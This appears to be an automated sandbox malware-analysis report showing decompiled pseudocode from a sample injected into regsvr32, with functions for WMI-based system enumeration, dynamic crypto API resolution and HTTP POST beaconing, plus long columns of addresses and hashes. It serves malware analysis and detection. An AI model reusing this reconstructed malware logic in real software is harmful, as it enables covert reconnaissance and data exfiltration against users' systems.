              • API String ID: 31276548-0
              • Opcode ID: 2fc23202c023d21f59c5a5dac5b7984f9037f06fd2f98a053371787a4d509953
              • Instruction ID: 0dab313779cbaad638e56f8c2236dda9cda17334645a0443fb549c86c901c57e
              • Opcode Fuzzy Hash: 2fc23202c023d21f59c5a5dac5b7984f9037f06fd2f98a053371787a4d509953
              • Instruction Fuzzy Hash: B6C01265A0120B56DF149BA5B9166EB73FC5B44649F100456EE02F20D1EB64DD414260
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073EACA Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 50%
              			E0073EACA(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0073E485(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E00738DC9(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E00738DDF( &_v60, 0xfffffffe);
					E0073E539( &_v104);
					return _t320;
				}
				_t165 = E00739F85(_t255, 0xcdd);
				 *_t328 = 0x6b4;
				_v52 = _t165;
				_t166 = E00739F85(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E00739C50(_t165);
				_v60 = _t322;
				E00738D9A( &_v52);
				E00738D9A( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E00739F85(_t255, 0xc93);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E00738D9A( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E00738DDF( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E00739AB3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E00739AB3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E00738E5D(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00738DC9( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E00738DDF(_t136, 0);
								E00738DDF( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E00739AB3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E00739F85(_t281, 0xcc1);
								 *_t329 = 0xabe;
								_t217 = E00739F85(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00738DC9(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E00738D9A( &_v92);
											E00738D9A( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E00739FE4();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00738DC9(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E00739F85(_t283, 0x2a);
										E00739FE4( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E00738D9A( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E00739AB3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0073E9AE( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E00738DDF( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































              0x0073ead3
              0x0073ead9
              0x0073eae0
              0x0073eae3
              0x0073eae6
              0x0073eaeb
              0x0073eaed
              0x0073eaf2
              0x0073ef37
              0x0073ef37
              0x0073eaff
              0x0073eb01
              0x0073eb04
              0x0073eb07
              0x0073ef1c
              0x0073ef22
              0x0073ef2c
              0x00000000
              0x0073ef31
              0x0073eb12
              0x0073eb19
              0x0073eb20
              0x0073eb23
              0x0073eb28
              0x0073eb2a
              0x0073eb2d
              0x0073eb30
              0x0073eb31
              0x0073eb3a
              0x0073eb40
              0x0073eb43
              0x0073eb4c
              0x0073eb51
              0x0073eb56
              0x0073eb6d
              0x0073eb7a
              0x0073eb7d
              0x0073eb84
              0x0073eb89
              0x0073eb90
              0x0073eb95
              0x0073eb9c
              0x0073eb9e
              0x0073ebaa
              0x0073ebad
              0x0073ebaf
              0x0073ef0c
              0x0073ef0d
              0x0073ef16
              0x00000000
              0x0073ef16
              0x0073ebb5
              0x0073ebb8
              0x0073ebbb
              0x0073ebbe
              0x0073ebc0
              0x0073eed8
              0x0073eedb
              0x0073eede
              0x0073eee0
              0x0073ef02
              0x0073ef07
              0x0073eee2
              0x0073eee5
              0x0073eef0
              0x0073eef7
              0x0073eef7
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0073ebc6
              0x0073ebc6
              0x0073ebd8
              0x0073ebdb
              0x0073ebdd
              0x00000000
              0x00000000
              0x0073ebe5
              0x0073ebe8
              0x0073ebeb
              0x0073ebee
              0x0073ebf1
              0x0073ebf4
              0x00000000
              0x00000000
              0x0073ebfa
              0x0073ec08
              0x0073ec0b
              0x0073ec0d
              0x0073ec26
              0x0073ec35
              0x0073ec3d
              0x0073ec3d
              0x0073ec40
              0x0073ec47
              0x0073ec4b
              0x0073ec51
              0x0073ec53
              0x0073eec0
              0x0073eec6
              0x0073eecc
              0x0073eecf
              0x0073eecf
              0x00000000
              0x0073eecf
              0x0073ec62
              0x0073ec76
              0x0073ec7a
              0x0073ec7c
              0x0073ec81
              0x0073ee8d
              0x0073ee93
              0x0073ee9e
              0x0073eea9
              0x0073eeaf
              0x0073eeb5
              0x0073eeb8
              0x00000000
              0x0073eeb8
              0x0073ec87
              0x0073ee5b
              0x0073ee5b
              0x0073ee5e
              0x0073ee61
              0x00000000
              0x00000000
              0x0073ec8f
              0x0073ec97
              0x0073ec9e
              0x0073eca4
              0x0073eca6
              0x00000000
              0x00000000
              0x0073ecaf
              0x0073ecc4
              0x0073ecca
              0x0073ecd3
              0x0073ecd6
              0x0073ecd9
              0x0073ecdb
              0x0073ee4e
              0x0073ee51
              0x0073ee5a
              0x0073ee5a
              0x00000000
              0x0073ee5a
              0x0073eceb
              0x0073ecee
              0x0073ecf5
              0x0073ecfb
              0x0073ecfe
              0x0073ed01
              0x0073ed04
              0x0073ed07
              0x0073ed43
              0x0073ed43
              0x0073ed46
              0x0073edef
              0x0073ee03
              0x0073ee13
              0x0073ee17
              0x0073ee19
              0x0073ee30
              0x0073ee34
              0x0073ee3d
              0x0073ee48
              0x00000000
              0x0073ee48
              0x0073ee1f
              0x0073ee20
              0x0073ee25
              0x0073ee25
              0x0073ee27
              0x0073ee28
              0x0073ee2d
              0x00000000
              0x0073ee2d
              0x0073ed4c
              0x0073ed4c
              0x0073ed4f
              0x0073edb7
              0x0073edcb
              0x0073eddb
              0x0073eddf
              0x0073ede1
              0x00000000
              0x00000000
              0x0073ede7
              0x0073ede8
              0x00000000
              0x0073ede8
              0x0073ed51
              0x0073ed51
              0x0073ed54
              0x00000000
              0x00000000
              0x0073ed56
              0x0073ed59
              0x00000000
              0x00000000
              0x0073ed5b
              0x0073ed5b
              0x0073ed61
              0x0073ed7a
              0x0073ed89
              0x0073ed92
              0x0073ed97
              0x0073ed9a
              0x0073eda0
              0x0073eda0
              0x0073eda5
              0x0073edb1
              0x00000000
              0x0073edb1
              0x0073ed66
              0x00000000
              0x0073ed66
              0x0073ed09
              0x0073ed30
              0x0073ed35
              0x0073ed3a
              0x0073ed3c
              0x0073ed3c
              0x00000000
              0x0073ed3a
              0x0073ed0b
              0x0073ed0b
              0x0073ed0e
              0x00000000
              0x00000000
              0x0073ed14
              0x0073ed14
              0x0073ed17
              0x00000000
              0x00000000
              0x0073ed1d
              0x0073ed1d
              0x0073ed20
              0x00000000
              0x00000000
              0x0073ed26
              0x0073ed29
              0x00000000
              0x00000000
              0x0073ed2b
              0x00000000
              0x0073ed2b
              0x0073ee6a
              0x0073ee70
              0x0073ee76
              0x0073ee79
              0x0073ee7c
              0x0073ee7c
              0x0073ee7f
              0x0073ee80
              0x0073ee83
              0x0073ee85
              0x00000000
              0x00000000
              0x0073eed5
              0x0073eed5
              0x00000000
              0x0073eed5
              0x0073ec0f
              0x0073ec15
              0x00000000
              0x0073ec15
              0x0073eed2
              0x00000000
              0x0073eb58
              0x0073eb5d
              0x0073eb62
              0x00000000
              0x0073eb66

              APIs
                • Part of subcall function 0073E485: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0073E7B4,00000E16,00000000,00000000,00000005), ref: 0073E498
                • Part of subcall function 0073E485: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0073E7B4,00000E16,00000000,00000000,00000005), ref: 0073E4A9
                • Part of subcall function 0073E485: CoCreateInstance.OLE32(0074C8A0,00000000,00000001,0074C8B0,00000000,?,0073E7B4,00000E16,00000000,00000000,00000005), ref: 0073E4C0
                • Part of subcall function 0073E485: SysAllocString.OLEAUT32(00000000), ref: 0073E4CB
                • Part of subcall function 0073E485: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0073E7B4,00000E16,00000000,00000000,00000005), ref: 0073E4F6
                • Part of subcall function 00738DC9: RtlAllocateHeap.NTDLL(00000008,?,?,00739793,00000100,?,0073661B), ref: 00738DD7
              • SysAllocString.OLEAUT32(00000000), ref: 0073EB73
              • SysAllocString.OLEAUT32(00000000), ref: 0073EB87
              • SysFreeString.OLEAUT32(?), ref: 0073EF0D
              • SysFreeString.OLEAUT32(?), ref: 0073EF16
                • Part of subcall function 00738DDF: HeapFree.KERNEL32(00000000,00000000), ref: 00738E25
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
              • String ID: FALSE$TRUE
              • API String ID: 1290676130-1412513891
              • Opcode ID: aec18a4e1d53c7284b1defc1fbd69a864d0eadf7162e67476095bb2343a5cafb
              • Instruction ID: cf3851d2065922089378d3f734c088b5783ab6d89fcdc9807314081775451fcc
              • Opcode Fuzzy Hash: aec18a4e1d53c7284b1defc1fbd69a864d0eadf7162e67476095bb2343a5cafb
              • Instruction Fuzzy Hash: F5E14C71E00219EFEB14DFA4C889EEEBBB9FF48300F104559F505AB296DB79A901CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00742951 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66libraryloaderCOMMON
              Download Yara Rule
              C-Code - Quality: 30%
              			E00742951(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E007428AC( &_v16);
				return 0;
			}











              0x00742957
              0x00742969
              0x0074296d
              0x007429e1
              0x00000000
              0x007429e3
              0x0074297d
              0x00742981
              0x00000000
              0x00000000
              0x00742989
              0x0074298b
              0x00742990
              0x00000000
              0x00000000
              0x0074299a
              0x0074299e
              0x00000000
              0x00000000
              0x007429a0
              0x007429a5
              0x007429a7
              0x007429a9
              0x007429ae
              0x007429b3
              0x00000000
              0x00000000
              0x007429be
              0x007429c8
              0x007429cc
              0x00000000
              0x00000000
              0x007429db
              0x00000000

              APIs
              • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,00737C84), ref: 00742963
              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 0074297B
              • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 00742989
              • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00742998
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$HandleModule
              • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
              • API String ID: 667068680-129414566
              • Opcode ID: bb22f30b46c0db0e02967fce1ca02a16f1c8ab11a768269f44c35f87c38bdf55
              • Instruction ID: 4fc301aba9213e13e15a9b11f7a8f7bbca262da9d98c133482412b8d799eceae
              • Opcode Fuzzy Hash: bb22f30b46c0db0e02967fce1ca02a16f1c8ab11a768269f44c35f87c38bdf55
              • Instruction Fuzzy Hash: A211C876A48719BBDB2196B48C46F9FB6ACAF45750F510161FA00F31D0DBB8EE018654
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073F7A3 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 268COMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E0073F7A3(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v68;
				void* _v72;
				intOrPtr _v92;
				int _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				void* _t166;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_t166 = 0x65;
				_v56 = E00739F6B(_t166);
				_v52 = E00739F6B(0xcc6);
				_v48 = E00739F6B(0xe03);
				_v44 = E00739F6B(0x64c);
				_t94 = E00739F6B(0x80a);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E00738F63( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E0073A5D0(_t190));
				_t102 =  *0x74f8f0; // 0x0
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x74f8f0; // 0x0
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x74f9d8,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E0073F73B(_t189);
							_t110 =  *0x74f8f0; // 0x0
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E0073A1F8(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x74f8f0; // 0x0
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E0073A1F8(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
										E0073F6E9(_t116);
									}
									_t117 = E00739F6B(0x82e);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x74f8f0; // 0x0
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E0073A5D0(_t193), _a4, _a8);
									E00738D87( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E0073A1F8(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E00738F63( &_v20, 0, _t122);
										_t127 =  *0x74f8f0; // 0x0
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
											_t129 = E0073A102( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x74f8f0; // 0x0
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
												_t139 =  *0x74f8f0; // 0x0
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x74f8f0; // 0x0
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x74f8f0; // 0x0
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x74f8f0; // 0x0
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x74f8f0; // 0x0
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
										_t194 = _v8;
										goto L21;
									}
								} else {
									GetLastError();
									_t153 =  *0x74f8f0; // 0x0
									 *((intOrPtr*)(_t153 + 8))(_t165);
									_t155 =  *0x74f8f0; // 0x0
									_t165 = 0;
									 *((intOrPtr*)(_t155 + 8))(_t189);
									_t189 = 0;
									_t194 = _v8;
									goto L22;
								}
							} else {
								GetLastError();
								_t159 =  *0x74f8f0; // 0x0
								 *((intOrPtr*)(_t159 + 8))(_t189);
								L21:
								_t189 = 0;
								__eflags = 0;
								goto L22;
							}
						}
						GetLastError();
						L22:
						_t186 = _t194;
						_t104 = _v12 + 1;
						_v12 = _t104;
						__eflags = _t104 - 2;
					} while (_t104 < 2);
					__eflags = _t186;
					if(_t186 != 0) {
						goto L25;
					}
					_t195 = 0xfffffffe;
					goto L30;
				}
				_t163 = 0xfffffffc;
				return _t163;
			}






























































              0x0073f7b1
              0x0073f7bd
              0x0073f7c4
              0x0073f7d1
              0x0073f7d4
              0x0073f7e5
              0x0073f7ef
              0x0073f7fa
              0x0073f807
              0x0073f814
              0x0073f821
              0x0073f824
              0x0073f829
              0x0073f82e
              0x0073f830
              0x0073f838
              0x0073f840
              0x0073f847
              0x0073f853
              0x0073f856
              0x0073f864
              0x0073f867
              0x0073f86d
              0x0073f86e
              0x0073f870
              0x0073f879
              0x0073f87a
              0x0073f87f
              0x0073f885
              0x0073f88f
              0x0073f88f
              0x0073f891
              0x0073f896
              0x0073f8a0
              0x0073f8ab
              0x0073f8b4
              0x0073f8b6
              0x0073f8b8
              0x0073f8c7
              0x0073f8de
              0x0073f8e4
              0x0073f8e7
              0x0073f8eb
              0x0073f8ed
              0x0073f8f2
              0x0073f8f2
              0x0073f8f7
              0x0073f8f9
              0x0073f90f
              0x0073f913
              0x0073f918
              0x0073f91a
              0x0073f91a
              0x0073f92e
              0x0073f939
              0x0073f93c
              0x0073f93f
              0x0073f942
              0x0073f947
              0x0073f94c
              0x0073f94c
              0x0073f94f
              0x0073f951
              0x0073f977
              0x0073f97b
              0x0073f97f
              0x0073f97f
              0x0073f989
              0x0073f991
              0x0073f996
              0x0073f9a1
              0x0073f9a7
              0x0073f9b1
              0x0073f9b4
              0x0073f9b9
              0x0073f9bd
              0x0073f9c2
              0x0073f9c2
              0x0073f9c7
              0x0073f9cb
              0x0073fa16
              0x0073fa18
              0x0073fa1b
              0x0073fa23
              0x0073fa27
              0x0073fa2a
              0x0073fa3c
              0x0073fa47
              0x0073fa49
              0x0073fa5d
              0x0073fa62
              0x0073fa67
              0x0073fa9c
              0x0073faa1
              0x0073faa6
              0x0073faa8
              0x00000000
              0x0073faa8
              0x0073fa6b
              0x0073fa6e
              0x0073fa6e
              0x0073fa74
              0x0073fa77
              0x0073fa7a
              0x0073fa7a
              0x0073fa7c
              0x0073fa7e
              0x0073fa84
              0x0073fa84
              0x0073fa87
              0x0073fa89
              0x0073fa8b
              0x0073fa92
              0x0073fa92
              0x00000000
              0x0073fa95
              0x0073fa4b
              0x0073fa51
              0x00000000
              0x0073f9cd
              0x0073f9cd
              0x0073f9d3
              0x0073f9d9
              0x0073f9dc
              0x0073f9e1
              0x0073f9e6
              0x0073f9e9
              0x0073f9ee
              0x0073f9ee
              0x0073f9f1
              0x0073f9f4
              0x00000000
              0x0073f9f4
              0x0073f953
              0x0073f953
              0x0073f959
              0x0073f95f
              0x0073f962
              0x0073f967
              0x0073f96a
              0x0073f96d
              0x0073f96f
              0x00000000
              0x0073f96f
              0x0073f8fb
              0x0073f8fb
              0x0073f901
              0x0073f907
              0x0073f9f7
              0x0073f9f7
              0x0073f9f7
              0x00000000
              0x0073f9f7
              0x0073f8f9
              0x0073f8ba
              0x0073f9f9
              0x0073f9fc
              0x0073f9fe
              0x0073fa01
              0x0073fa04
              0x0073fa04
              0x0073fa0d
              0x0073fa0f
              0x00000000
              0x00000000
              0x0073fa13
              0x00000000
              0x0073fa13
              0x0073f889
              0x00000000

              APIs
              • memset.MSVCRT ref: 0073F7D4
              • memset.MSVCRT ref: 0073F7E5
                • Part of subcall function 00738F63: memset.MSVCRT ref: 00738F75
              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0073F8BA
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: memset$ErrorLast
              • String ID: POST
              • API String ID: 2570506013-1814004025
              • Opcode ID: 68f404b2e0acd0d13bab8e04fc099641bfb2ee3f1317ac5396b3492ca0291229
              • Instruction ID: f475be69134340f7f5fee2fe0763122535891fca8526c05c13338dcfd904b36b
